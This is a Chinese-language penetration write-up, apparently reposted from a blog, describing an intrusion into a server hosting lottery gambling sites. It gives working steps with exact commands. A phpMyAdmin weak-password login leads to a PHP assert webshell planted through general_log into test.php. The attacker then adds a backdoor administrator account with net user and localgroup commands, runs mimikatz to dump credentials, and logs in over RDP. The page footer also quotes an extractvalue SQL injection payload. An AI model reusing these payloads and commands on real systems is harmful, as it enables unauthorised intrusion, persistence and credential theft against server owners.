首页 > 其他分享 >渗透系列之打击彩票站

渗透系列之打击彩票站

时间:2024-01-17 20:13:03浏览次数:27  
标签:phpmyadmin 系列 文件 渗透 3389 彩票 Test 服务器 日志

获取phpmyadmin弱口令

通过信息收集到彩票站点的ip为xxx,探测扫描发现存在phpmyadmin,通过猜测,使用默认弱口令(root/root)登入到phpmyadmin当中。

图片

图片

通过phpmyadmin后台sql查询写入shell到日志文件

使用phpmyadmin的sql查询功能将一句话木马写入到日志文件当中。

流程和命令如下:

1、开启日志功能:set global general_log=on;

2、点击phpmyadmin变量查看日志文件名字:

图片

这里的日志文件是test.php。

3、执行SQL命令写入一句话到日志文件: SELECT'<?php assert($_POST["test"]);?>';

图片

4、执行成功返回。

图片

5、查看日志文件。

图片

6、菜刀连接添加用户并且上传mimikatz。

使用菜刀连接日志文件木马,xxx/test.php 密码:test

图片


查看发现是系统管理员sysytem权限,直接添加用户且添加到管理组即可。

命令为: C:\Windows\system32\net.exe user Test Test!@#123 /add

C:\Windows\system32\net.exe  localgroup administrators Test /add

上传mimikataz到服务器当中。

图片


7、3389连接,读取管理员密码。

(1)、直接telnet ip 3389 测试发现可通,于是直接连接3389进去。

图片

(2)、或者这里在菜刀上执行以下命令查询3389开放的端口也一样。

第一步: tasklist /svc | findstr TermService 查询远程桌面服务的进程

第二步: netstat -ano | findstr ****  //查看远程桌面服务进程号对应的端口号。

(3)、执行mimikatz,读取到管理员组登录密码。

图片

(4)、使用获取的administrator/xxxx账户密码远程登入服务器当中。

图片

发现该服务器使用phpmystudy批量建立彩票站,大概有十几个站点,随意访问几个服务器上的网站域名,部分截图如下:

系统一:

图片


系统二:

图片

系统三:

图片


后台一:

图片

后台二:

图片




转自于原文链接: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247487003&idx=1&sn=5c85b34ce6ffb400fdf858737e34df3d&chksm=ce67a482f9102d9405e838f34479dc8d1c6b793d3b6d4f40d9b3cec9cc87f14555d865cb3ddc&scene=21#wechat_redirect

https://blog.csdn.net/weixin_39997829/article/details/109186917

标签:phpmyadmin,系列,文件,渗透,3389,彩票,Test,服务器,日志
From: https://www.cnblogs.com/backlion/p/17971063

相关文章

  • 记一次内衣网站渗透测试
    这站真大,不对,这站真圆.php的站随便随便一测一枚注入因为只能读取32位所以使用substring分开读取https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,(selectpasswordfromadminlimit1,1),0x7e))%20#https://aaaa.com/1.php?id=210%20and%20extractvalue......
  • BC实战后渗透之Bypass Applocker到提权
    0x01前言 提示:当个反面案例看就好,实际上拿下的方式远没有下文说的那么麻烦,只怪自己太心急… 本来是之前BC项目搞下来的一个推广站,当时只拿到了Shell权限是一个普通用户,想提权进一步收集服务器上的信息时,发现运行各种东西都是权限拒绝,提示组策略阻止了这个程序,当时因为还有的别......
  • 对诈骗(杀猪盘)网站的渗透测试
    今天朋友突然告诉我,某转买手机被骗了1200块钱,心理一惊,果然不出所料,那我来试试吧。要来了诈骗网站地址,打开是这种:果断收集一下信息:(由于留言骗子返还朋友钱款,暂时给他留点面子,打点马赛克)查看端口,一猜就是宝塔面板搭建开着80,那就访问一下:从官网查找客服软件的教程。发现后台路径为:/ad......
  • 一次菠菜网站的渗透测试
    从某个大哥手里拿到一个菠菜得day,是一个任意文件上传得0day,通过任意文件上传获取到webshell,但是扫描端口能看到开启了宝塔。然后就出现了下面的问题。使用哥斯拉的bypass插件可以执行命令。用户为WWW,宝塔的默认用户,接下来就是常规操作,提权、SSH登陆拿宝塔。先进行提权,上传脏牛然后......
  • 记一次菠菜网站渗透半成品
    前言在一个风和日丽的下午,我们正在Blank的带领下,兴致勃勃地讨论着,女人。而float先生发现了一个访问了他博客的奇怪IP。哎,根本不把什么网络安全法放在眼里,直接就开打。GameStart浏览器访问会直接跳登陆界面。信息收集路径上敲个X。拿到ThinkPHP和版本号。同时,float先生nmap扫到801......
  • SpringSecurity系列,第四章:源码分析
    源码分析SpringSecurity的核心功能即为:认证(Authentication)、授权(Authorization)一、概览1、在SpringSecurity中,用户的认证信息主要由Authentication的实现类来保存,Authentication接口定义如下:【保存用户认证信息】publicinterfaceAuthenticationextendsPrin......
  • Mysql系列---【mysql创建用户和赋权】
    全文注意大小写,我用的mysql5.7.27版本,设置区分大小写。%:代表所有主机都可以连接;如果是localhost,表示只用sqlshell在本机能连接;如果是指定的ip,表示只有这个ip的主机才能连接。1.sqlshell登录root用户mysql-uroot-ppwd;2.创建数据库CREATEDATABASExxl_jobdb;3.创建x......
  • 现代 IT 人一定要知道的 Ansible系列教程:Roles详解
    现代IT人一定要知道的Ansible系列教程:Roles详解AnsiblePlaybook提供了一个可重复、可重用、简单的配置管理和多机部署系统,非常适合部署复杂的应用程序。如果您需要多次使用Ansible执行任务,请编写一个playbook并将其置于源代码控制之下。然后,您可以使用playbook推出新配......
  • 【源码系列#06】Vue3 Diff算法
    专栏分享:vue2源码专栏,vue3源码专栏,vuerouter源码专栏,玩具项目专栏,硬核......
  • Asp .Net Core 系列:集成 Ocelot+Consul实现网关、服务注册、服务发现
    什么是Ocelot?Ocelot是一个开源的ASP.NETCore微服务网关,它提供了API网关所需的所有功能,如路由、认证、限流、监控等。Ocelot是一个简单、灵活且功能强大的API网关,它可以与现有的服务集成,并帮助您保护、监控和扩展您的微服务。以下是Ocelot的一些主要功能:路由管理:Ocelot允许......